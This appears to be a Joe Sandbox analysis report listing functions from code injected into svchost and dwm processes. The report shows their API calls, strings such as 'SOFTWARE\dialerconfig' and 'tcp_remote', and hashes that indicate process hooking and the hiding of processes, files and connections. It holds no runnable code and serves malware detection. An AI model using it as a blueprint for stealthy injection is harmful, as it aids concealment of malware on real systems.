Function 0000026E027A12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000026E027A12E0
_set_statfp.LIBCMT ref: 0000026E027A12FB
_set_statfp.LIBCMT ref: 0000026E027A1317
_set_statfp.LIBCMT ref: 0000026E027A1353

Memory Dump Source

Source File: 0000000A.00000002.2628133468.0000026E02790000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E02790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e02790000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 306ed0f9a8ce923b34550b23e0447b8c7fbd5d4c3aa55d30c293b06b1607e809
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 4B11913EA94A0049FE681965E5DE37911C06BD4374FCF4634BB7F26AD68ABA8C414114

Function 0000026E027C3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000026E027C3886
GetCurrentProcess.KERNEL32 ref: 0000026E027C38B4
VirtualProtectEx.KERNEL32 ref: 0000026E027C38D6
GetCurrentProcess.KERNEL32 ref: 0000026E027C38F4
VirtualProtectEx.KERNEL32 ref: 0000026E027C3915

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: c5f637122e4ed7850266f55ef1623497a967814e6ec45223b2bb1c521939212d
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: D8113C3A704B418BEF149B21F44866966F1F748B84F5A4069DE8917794EF7EC504CB00

Function 0000026E027984F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026E02798503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026E02798598

Strings

csm, xrefs: 0000026E0279857E
f, xrefs: 0000026E02798516

Memory Dump Source

Source File: 0000000A.00000002.2628133468.0000026E02790000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E02790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e02790000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: d08c8700d76a78cb0c850101bba095738e44c759dd3315024c9db82c63c9ae1f
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 9C51B13A7127108EEF14CF15E488B3933E5F342B98F5A8124DA1A6B7C9DBB6C941C706

Function 0000026E027984D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026E02798503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026E02798598

Strings

csm, xrefs: 0000026E0279857E
f, xrefs: 0000026E02798516

Memory Dump Source

Source File: 0000000A.00000002.2628133468.0000026E02790000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E02790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e02790000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 2e34a33e8b951dc0b157d7c85fd4c9d309e6cab236e5dbf5ad78db3a83483f47
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 0131D13A2017508EEF14DF11E8CC72937E9F341B98F1A8014AE4A677C5CBBAC944C706

Function 0000026E027C14B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026E027C14D5
HeapFree.KERNEL32 ref: 0000026E027C14E4
GetProcessHeap.KERNEL32 ref: 0000026E027C14F0
HeapFree.KERNEL32 ref: 0000026E027C14FF
GetProcessHeap.KERNEL32 ref: 0000026E027C152A

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction ID: c945b41d6b1a77b17dc736a4c4eb5d4615414c3e2fa7c32a8a5d32909ddcca4b
Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction Fuzzy Hash: 8D115E39614F89DAEB549F66F88822A73B0F789B80F094069DB8A13795DF7AC051CB01

Function 0000026E027C26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000026E027C27D4
StrCpyW.SHLWAPI ref: 0000026E027C27ED

Strings

\\.\pipe\, xrefs: 0000026E027C27DF

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 293d11b8bcc3bed5511c8e55199a8cc5950c380228a3a3dc7daa9be91f8680c6
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 4C71C47A2047814AEF689F3599C83FA67D0F745B84F6E402ADD4A77BCADEB6C5048700

Function 0000026E027C24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000026E027C25C3
StrCpyW.SHLWAPI ref: 0000026E027C25DA

Strings

\\.\pipe\, xrefs: 0000026E027C25CE

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 4730922445fba0afd729ff619876ef7e1fd9d4807e9105935bc2155c3d40dba4
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: D151EC3A2047814AEE75AE3595DC37A66D1F785780F6E4129CD8A33FDACAB7C8018B50

Function 0000026E027D0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000026E027D071B
GetLastError.KERNEL32 ref: 0000026E027D073D

Strings

U, xrefs: 0000026E027D06C7

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 7eac34bbef102e6c47f8f5a6496b14d7b461bf55e7a23bd93312cc1a63268345
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: F041D536714A808AEF209F25E4883AAB7F0F388794F4A4025EE8D97788DB7DC441CB40

Function 0000026E027CD6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026E027CD6F9
LCMapStringW.KERNEL32 ref: 0000026E027CD781

Strings

LCMapStringEx, xrefs: 0000026E027CD6DC, 0000026E027CD6ED

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: a24c0459c01ebddc388d5b2883160e35a780ad4efc37e4fcb2efb279007c2527
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 94111239608B808ADB60CB56F4842AAB7B5F7C9B90F584126EECD53B59DF79C450CB00

Function 0000026E027C94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000026E027C94E8
RaiseException.KERNEL32 ref: 0000026E027C952E

Strings

csm, xrefs: 0000026E027C951B

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 6e321ace0db8733173165fb413e00db85a1b1ce38e23647320c2183226c58682
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: E7113D36204B8086EBA08B25F58426AB7E0F788B98F2D4225DF8D177A4DF7DC551CB00

Function 0000026E027CD65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026E027CD68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000026E027CD6A7

Strings

InitializeCriticalSectionEx, xrefs: 0000026E027CD681

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 19a40bc9aff518ddf8ae5680a2be623e4ca6d1fcb1b5fe591b215ebb3cb361f5
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 97F0E93931078087EF146B51F48867563B0A788BC0F5E4025AA8D23B94CFBAC494C700

Function 0000026E027CD608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026E027CD631
TlsSetValue.KERNEL32 ref: 0000026E027CD648

Strings

FlsSetValue, xrefs: 0000026E027CD61E

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 0a61cd9ef17e401306ac681dcd5933b3761cfae0940fe3a9e9e710fff15b033f
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 64E09B7920064097FF145B65F8CC7B563B1BBC8780F5E4036D589263D5CEBAC855C700

Function 0000026E0279CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026E0279CBC5

Strings

November, xrefs: 0000026E0279CBA8, 0000026E0279CBB2
October, xrefs: 0000026E0279CBBE

Memory Dump Source

Source File: 0000000A.00000002.2628133468.0000026E02790000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E02790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e02790000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 617fd73f1689e2853b7dcfcecc9b79dd44f18d34fdab6d51be7d8570230a9733
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 6FE0927A2046419AFF059B51F4D82F432E1DBC8750F5F5027AA19262D6CFBAC8868340

Function 0000026E027C1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026E027C1D9B
HeapAlloc.KERNEL32 ref: 0000026E027C1DAA
GetProcessHeap.KERNEL32 ref: 0000026E027C1E1E
HeapFree.KERNEL32 ref: 0000026E027C1E2C

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 84d304e92210c3a5516ea8afc0f90508175ca4ff531b927cfa7d01b56a93969e
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: F521A936605F908AEF118F69E44826AF3E0FB84B94F5A4124DE8C97B55EFB9C542C700

Function 0000026E027C1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026E027C127A
HeapAlloc.KERNEL32 ref: 0000026E027C1289
GetProcessHeap.KERNEL32 ref: 0000026E027C12A3
HeapAlloc.KERNEL32 ref: 0000026E027C12B4

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 3578bc6c7432bad737c7c750152b3da7679d02cb8aa83872e3fa5392a8936c42
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 97E0EDB5611A01CBEB049F66D85836976F1FB88F52F4EC064C98907390DFBF8499CB51

Analysis Process: dwm.exePID: 980, Parent PID: 8108COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	94.1%
Signature Coverage:	0%
Total number of Nodes:	102
Total number of Limit Nodes:	16

Executed Functions

Function 000001C6CEF11650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001C6CEF1165B
HeapAlloc.KERNEL32 ref: 000001C6CEF1166A

Part of subcall function 000001C6CEF11274: GetProcessHeap.KERNEL32 ref: 000001C6CEF1127A
Part of subcall function 000001C6CEF11274: HeapAlloc.KERNEL32 ref: 000001C6CEF11289
Part of subcall function 000001C6CEF11274: GetProcessHeap.KERNEL32 ref: 000001C6CEF112A3
Part of subcall function 000001C6CEF11274: HeapAlloc.KERNEL32 ref: 000001C6CEF112B4

RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF116DA
RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF11707
RegCloseKey.ADVAPI32 ref: 000001C6CEF11721
RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF11741
RegCloseKey.ADVAPI32 ref: 000001C6CEF1175C
RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF1177C
RegCloseKey.ADVAPI32 ref: 000001C6CEF11797
RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF117B7
RegCloseKey.ADVAPI32 ref: 000001C6CEF117D2
RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF117F2
RegCloseKey.ADVAPI32 ref: 000001C6CEF1180D
RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF1182D
RegCloseKey.ADVAPI32 ref: 000001C6CEF11848
RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF11868
RegCloseKey.ADVAPI32 ref: 000001C6CEF11883
RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF118A3
RegCloseKey.ADVAPI32 ref: 000001C6CEF118BE
RegCloseKey.ADVAPI32 ref: 000001C6CEF118C8

Part of subcall function 000001C6CEF112C8: RegQueryInfoKeyW.ADVAPI32 ref: 000001C6CEF11326
Part of subcall function 000001C6CEF112C8: GetProcessHeap.KERNEL32 ref: 000001C6CEF11334
Part of subcall function 000001C6CEF112C8: HeapAlloc.KERNEL32 ref: 000001C6CEF11345
Part of subcall function 000001C6CEF112C8: RegEnumValueW.ADVAPI32 ref: 000001C6CEF113A1
Part of subcall function 000001C6CEF112C8: GetProcessHeap.KERNEL32 ref: 000001C6CEF113E9
Part of subcall function 000001C6CEF112C8: HeapAlloc.KERNEL32 ref: 000001C6CEF113F7
Part of subcall function 000001C6CEF112C8: GetProcessHeap.KERNEL32 ref: 000001C6CEF1141B
Part of subcall function 000001C6CEF112C8: HeapFree.KERNEL32 ref: 000001C6CEF11429
Part of subcall function 000001C6CEF112C8: lstrlenW.KERNEL32 ref: 000001C6CEF11432
Part of subcall function 000001C6CEF112C8: GetProcessHeap.KERNEL32 ref: 000001C6CEF11440
Part of subcall function 000001C6CEF112C8: HeapAlloc.KERNEL32 ref: 000001C6CEF1144E

Strings

paths, xrefs: 000001C6CEF117B0
service_names, xrefs: 000001C6CEF117EB
process_names, xrefs: 000001C6CEF11775
tcp_remote, xrefs: 000001C6CEF11861
udp, xrefs: 000001C6CEF1189C
pid, xrefs: 000001C6CEF1173A
tcp_local, xrefs: 000001C6CEF11826
startup, xrefs: 000001C6CEF116FD
SOFTWARE\dialerconfig, xrefs: 000001C6CEF116BA

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 4b413b815da05522b192e873043b4a5273b652f8b123e7ffde26ea6227f556a1
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 787127B6751A9585FB10DFA6EC94AD923B4FBA8B8CF005111DEAD47B28DF38C544C308

Function 000001C6CEF15C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001C6CEF15C4B
GetThreadContext.KERNEL32 ref: 000001C6CEF15DB5

Part of subcall function 000001C6CEF15A40: GetCurrentThreadId.KERNEL32 ref: 000001C6CEF15A44

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
Instruction ID: 390e2b3793c9e8820de7e6cb88742dab50249f28b9ce630da3974e5956a36fa5
Opcode Fuzzy Hash: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
Instruction Fuzzy Hash: E3D1BA76249B8882EB70DB5AE89479A77B0F3C8B84F101216EADD47BA5DF3DC541CB04

Function 000001C6CEF151B0 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001C6CEF15236

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
Instruction ID: 1401f7594aedbc2a40fc320add54b261cbf437334fd16b5007d919a237512fc1
Opcode Fuzzy Hash: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
Instruction Fuzzy Hash: CE02F972259B8486EBA1CB95E89479AB7B1F3C4784F101015EADE87BA8DF7DC484CF04

Function 000001C6CEF13878 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 000001C6CEF13886
GetCurrentProcess.KERNEL32 ref: 000001C6CEF138B4
VirtualProtectEx.KERNEL32 ref: 000001C6CEF138D6
GetCurrentProcess.KERNEL32 ref: 000001C6CEF138F4
VirtualProtectEx.KERNEL32 ref: 000001C6CEF13915

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 02e7c52fa1eefa398fd4b30c104494b3dc2ebb6dd0ddfc9c49650c7f2dc12be1
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 02115E7A746B8582FB189B51F808BA966B1F788B94F450029DEE907794EF7DC504C708

Function 000001C6CEF13AC0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000001C6CEF13B46
VirtualAlloc.KERNEL32 ref: 000001C6CEF13B80

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction ID: f6705c223946c7667315452564325fe4ca9baa9446a0b5e1971e3db26f5c99d8
Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction Fuzzy Hash: 8831217225AA8881FB34DB95E854B9AB3B0F388784F110525F5DD46BA8EFBDC540CB08

Function 000001C6CEF13458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001C6CEF1347A
PathFindFileNameW.SHLWAPI ref: 000001C6CEF13489

Part of subcall function 000001C6CEF13930: StrCmpNIW.SHLWAPI ref: 000001C6CEF13948

Part of subcall function 000001C6CEF13878: GetModuleHandleW.KERNEL32 ref: 000001C6CEF13886
Part of subcall function 000001C6CEF13878: GetCurrentProcess.KERNEL32 ref: 000001C6CEF138B4
Part of subcall function 000001C6CEF13878: VirtualProtectEx.KERNEL32 ref: 000001C6CEF138D6
Part of subcall function 000001C6CEF13878: GetCurrentProcess.KERNEL32 ref: 000001C6CEF138F4
Part of subcall function 000001C6CEF13878: VirtualProtectEx.KERNEL32 ref: 000001C6CEF13915

CreateThread.KERNEL32 ref: 000001C6CEF134D7

Part of subcall function 000001C6CEF11EB4: GetCurrentThread.KERNEL32 ref: 000001C6CEF11EBF

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: f2f801e5341de374d818ecdcd1021b69ccc215b2ed4f10c19c2c823c9aff2920
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: BA11D2F16D625982FB25D7E4FC0AFE922B4B7A4304F5580299AF6851D4EFBCC044C21C

Function 000001C6CEF14ED0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000001C6CEF14ED4
VirtualProtect.KERNEL32 ref: 000001C6CEF14F17
FlushInstructionCache.KERNEL32 ref: 000001C6CEF14F2C

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
Instruction ID: bc9f3c36bdff4e1bc3e18ff399c7788fed31c954ffbd22f3ec76684d8bbc9d87
Opcode Fuzzy Hash: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
Instruction Fuzzy Hash: 22F0BD76258B8881E730DB45E851B8A67B0E3C87D4F140115B9DE07BA9CF39C190CB04

Function 000001C6CEEE2908 Relevance: 3.2, APIs: 2, Instructions: 186
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000001C6CEEE29AA
LoadLibraryA.KERNELBASE ref: 000001C6CEEE2A31

Memory Dump Source

Source File: 0000000B.00000002.2715105273.000001C6CEEE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEEE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6ceee0000_dwm.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: b0eb08e3bfbb60eeeb536c4b1ea7b986651c0ff517f7c980f80b92fe55bfddbf
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: B961FE32741A5187FB68CF25D840BA9B3A6FB4CBD4F548025DA9E07785EB38E853C748

Function 000001C6CEF11C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

